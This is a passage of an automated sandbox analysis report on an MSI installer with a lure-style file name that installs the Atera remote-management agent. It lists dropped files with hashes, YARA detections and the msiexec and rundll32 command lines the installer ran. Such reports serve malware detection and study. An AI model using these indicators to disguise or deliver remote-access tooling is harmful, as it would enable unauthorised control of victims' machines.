                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.6016796972852392
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:S8PhTuRc06WXz+nT5odfqqmaSjndddwEqdGUDjzbQiSsndddSE8Qq:9hT1jnT6fqqmaf3DfNaQq
                                                                                                                                                                                                                                        MD5:6DCE79B8B3C21F74B4479E523BF949F8
                                                                                                                                                                                                                                        SHA1:863E871C321FFFF7511AE01C7DAFC36A2A0A9BE9
                                                                                                                                                                                                                                        SHA-256:03050FF94DEF001CC234B47DB7A07F246D51804C1DB8321EAB039F0E27C6B68F
                                                                                                                                                                                                                                        SHA-512:BE06C0A8839E334902A0FCCAFDCBB0CC72EFCA877F35A39E57C7AF62863232FD296E0A968A9B532587BB43C407CE8DB2239A5F1E9223AEA23968DC5A1EC70CAA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFD433CA0145E2A93A.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFD8DCAE56948DA1E4.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFD9D91EC098F6A6B5.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.5814558018431928
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:W8PhmuRc06WX4wnT556SVRfqISoedGPdGfMKrQP/StedGPdGRubkZn:phm1AnTf62SIBvHoYZ
                                                                                                                                                                                                                                        MD5:A46F9A7AF8750EB4C350A1ADD299E2D2
                                                                                                                                                                                                                                        SHA1:EF225989A2D053A399C97A17F290C948C73F4659
                                                                                                                                                                                                                                        SHA-256:E9268BAA413D01BE9227509E0699E46726EE3FEEC07AF22802EBE2C98AB43C5D
                                                                                                                                                                                                                                        SHA-512:9FBDF5EF569DCCFD48AC84DA5C91936149D547A40A7D404846AF2E54571421EA64B1AD6805FD5E1C6DAF98BCA45014064278D44A4685CA2D6EE98B584E11CBE0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFD9D91EC098F6A6B5.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFE2B0B74C08C1B7FA.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):0.07983391774199625
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO4yEOjg7SVky6l/X:2F0i8n0itFzDHF2Vt/X
                                                                                                                                                                                                                                        MD5:8EFFECF0F29DB122BC857B544D850D65
                                                                                                                                                                                                                                        SHA1:DE6A8B49C932AA051169EE79D7070F520E4E70BE
                                                                                                                                                                                                                                        SHA-256:57A76199CC984828B15FFAE86BB219DF22ECB3087CAC3BC4ED5FD8F1FC7E81AA
                                                                                                                                                                                                                                        SHA-512:05C0A6D612BABE246412C4FD2A70CCFC9375AE11736461A693561E5E8436B11B13E5D7B20E41E1A8F0E1BAC7576C8A9B2CD925D46FF8672AFA6492ACF6C1C1CD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFE2DCB96B45A4216C.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                        Entropy (8bit):1.001188130623557
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:GMMXukNveFXJbT5pBDeqISoedvPdvbCnuhnq9FnCdStedvPdvxubS:2XeDTnBD7IciuBulU4
                                                                                                                                                                                                                                        MD5:42E81CFC7B310BB55F06B690BE59224B
                                                                                                                                                                                                                                        SHA1:EE6BFEAD13AB267AF5B148D8A6FE9016E55F8C6B
                                                                                                                                                                                                                                        SHA-256:687DE0A4C6FC5714E780AAADFFAE77D0EA91007C27348191B6DE1B9897EC77DD
                                                                                                                                                                                                                                        SHA-512:F4A2FF0246C8CCCF0CDC5C2466C9923F04F0ACCC40585E1103454F4F73B736604719C1984EF443ED84671D78975BE34AA9886AC9F2C205139B8DC6F38DDCBDE4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFE2DCB96B45A4216C.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFE61BD4C904D39D5F.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.6045756871847139
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:C8Ph4uRc06WXzAFT5qd/8BctSjndd4d/EqdGUDjzbQSSsndd4dXE8:th411FT0/8Bc93DfNg
                                                                                                                                                                                                                                        MD5:DDB86F5B58A205F2D26E2ECDB06069CD
                                                                                                                                                                                                                                        SHA1:AB425904331722C227225F6ACDC23FD657B01F90
                                                                                                                                                                                                                                        SHA-256:B75A8CDEFF4B90500AB54993394B554694F48468B25F78F895AB710649C966BE
                                                                                                                                                                                                                                        SHA-512:17E4B940DCC23C9CC616A0259C7E50726ED126564A55CDB26F188F37013F4DE85885E3E5E914B15E9B1CFC8C3C574607D99E47AD58D3D1989D6A94770FF04EB2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFE61BD4C904D39D5F.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFE6A2605396FBB224.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                                                                                        Entropy (8bit):0.14916427682775762
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:CnjEubmStedGPdGeqISoedGPdGfMKrQPa76SV:ijNyLIBvC76
                                                                                                                                                                                                                                        MD5:ECF49FFC4CD15A17D90E20696F35E86F
                                                                                                                                                                                                                                        SHA1:2D000DA7FD082CA5B0A54A8E69E20B512FC388CE
                                                                                                                                                                                                                                        SHA-256:69195FE06B35713E430496C185AF2B06079E897C6E65AA8B1D51855F57B6121F
                                                                                                                                                                                                                                        SHA-512:D1672CC7B4DD59F6A65F2A8CFBC50F6D56D3B4282E2E8BA5A764C40F48A3844D7FBB887E833A6012AB1EA037CCC5518C38F5B7D46FD92B4BEDD15D41F9F8E165
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFE6A2605396FBB224.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFE8E4786049387F04.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2801471122011585
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:rHhwu3th8FXzFT51d/8BctSjndd4d/EqdGUDjzbQSSsndd4dXE8:rBw3rT5/8Bc93DfNg
                                                                                                                                                                                                                                        MD5:F748ABB85E9F4504D2418E6191C492E0
                                                                                                                                                                                                                                        SHA1:4FB87176D22E34B6B7C3DCD87BB354401F4900C3
                                                                                                                                                                                                                                        SHA-256:4507DF3C9832380F26C91DCBD407F5B514C896A0ADD4E1D1D6E8DBCD4EF791FC
                                                                                                                                                                                                                                        SHA-512:0FE554965514706AFA6FED05164039B0BE3E3CD3B2DEBA0A0879BC98D4C18EA048E3EAE91B3BD246DA41F8CC773A6B5A6AB7E5AB9BE01270132585CD372AA98E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFE8E4786049387F04.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFF601E6433D342717.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFF70499EBAAFF961F.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFFCBA91410B3A4758.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.255395292365597
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:n69u5th8FXz/T57dYm81RGSjnd/EqdGUDjzbQ6Ssnd/E8J:69RBTPn818I3DfNP
                                                                                                                                                                                                                                        MD5:4B6C30E4090CFC782D0CAD9F2CFC6C0E
                                                                                                                                                                                                                                        SHA1:F5CBAB5E2A09E50DBA6188C07818486DF06EDAE1
                                                                                                                                                                                                                                        SHA-256:DCF090068A14B7EECAF69890A43768B522686BD29112217EAB5AFF90D157D617
                                                                                                                                                                                                                                        SHA-512:A6294C4B864351B178BE2AE4CF4A1822C94EF56E97F9722E720B7069A894A2642251D38AF6D7C3BED1450691759539D198D0910FF4DE26602693E168D15E8E1B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFFCBA91410B3A4758.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFFF1652BE8AC56D96.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        \Device\ConDrv

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4019
                                                                                                                                                                                                                                        Entropy (8bit):5.254468395309833
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:W/gDO5ig8O5PgFO5/gYgOVOhVWgBNNXzHSxBNN4zPzRlXNzSPeZgg9dSjedcdS4b:WIkvZY6IH8afhbZh9A6qA4AAADjAN
                                                                                                                                                                                                                                        MD5:4017401B19043652DA66E659D10F50B9
                                                                                                                                                                                                                                        SHA1:5383454BAEEDC7E55D253BC6AFE6E2A80BD9906E
                                                                                                                                                                                                                                        SHA-256:A4F6728F5E2EB8D82463B67093CD2FDF814052C0C24FBE524ADCC0FE0E6B76D2
                                                                                                                                                                                                                                        SHA-512:CA8AE4FDE3D1E19BB3DF93741B5DD48BB2D2887B829538BAC3E6C5A367DFD48953D6DCC808209BD80924028FB294D95179BE18BF81A7F2B1EEB7A8CA4479DFA8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: \Device\ConDrv, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:2024-10-02 11:20:38.4434|ERROR|WindowsWindowedEventLogProvider|Error on retry number 1: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2024-10-02 11:20:39.5372|ERROR|WindowsWindowedEventLogProvider|Error on retry number 2: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2024-10-02 11:20:41.5684|ERROR|WindowsWindowedEventLogProvider|Error on retry number 3: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2024-10-02 11:20:44.5997|ERROR|WindowsWindowedEventLogProvider|Error initializing last processed events, ignoring file, exception: System.IO.FileNotFoundException: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...File name: 'C:\Progr

                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                        Entropy (8bit):7.878684894941199
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Microsoft Windows Installer (60509/1) 57.88%
                                                                                                                                                                                                                                        • ClickyMouse macro set (36024/1) 34.46%
                                                                                                                                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 7.66%
                                                                                                                                                                                                                                        File name:TRABALHO----PROCESSO0014S55-S440000000S1.msi
                                                                                                                                                                                                                                        File size:2'994'176 bytes
                                                                                                                                                                                                                                        MD5:50159e0e7acfd900e3190f860297d1e6
                                                                                                                                                                                                                                        SHA1:d4f6302266269f2bddfaaa96625dd3d391e11e25
                                                                                                                                                                                                                                        SHA256:9104930a661af5e641ad911fc30c0887433713ea589e389f06cbd5bb0a7ed5ad
                                                                                                                                                                                                                                        SHA512:bdd424b5ddadae02a8a4d16cf67268613544a313c0e33f213b5ba2cf7130504596b9f2092b7c7a6660da7df54f779a8c2b472e243777db5dc34e35eb732a9488
                                                                                                                                                                                                                                        SSDEEP:49152:z+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:z+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                        TLSH:B1D523117584483AE37B0A358D7AD6A05E7DFE605B70CA8E9308741E2E705C1AB76F73
                                                                                                                                                                                                                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                        Icon Hash:2d2e3797b32b2b99

                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                        Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:09:57:44
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\TRABALHO----PROCESSO0014S55-S440000000S1.msi"
                                                                                                                                                                                                                                        Imagebase:0x7ff65d820000
                                                                                                                                                                                                                                        File size:69'632 bytes
                                                                                                                                                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                        Start time:09:57:45
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                        Imagebase:0x7ff65d820000
                                                                                                                                                                                                                                        File size:69'632 bytes
                                                                                                                                                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                        Start time:09:57:45
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 460615119F137567DDB08B202FD1B71F
                                                                                                                                                                                                                                        Imagebase:0x330000
                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                        Start time:09:57:46
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:rundll32.exe "C:\Windows\Installer\MSI9B15.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5020687 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                                                                                                                                                                                                                        Imagebase:0xbe0000
                                                                                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                        Start time:09:57:47
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                                                                                                                                                                        Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                        Start time:09:57:47
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:rundll32.exe "C:\Windows\Installer\MSIA259.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5022328 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                                                                                                                                                                                                                        Imagebase:0xbe0000
                                                                                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000006.00000003.1315354655.0000000004A36000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000006.00000002.1359772261.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000006.00000002.1359772261.0000000004D64000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                        Start time:09:57:52
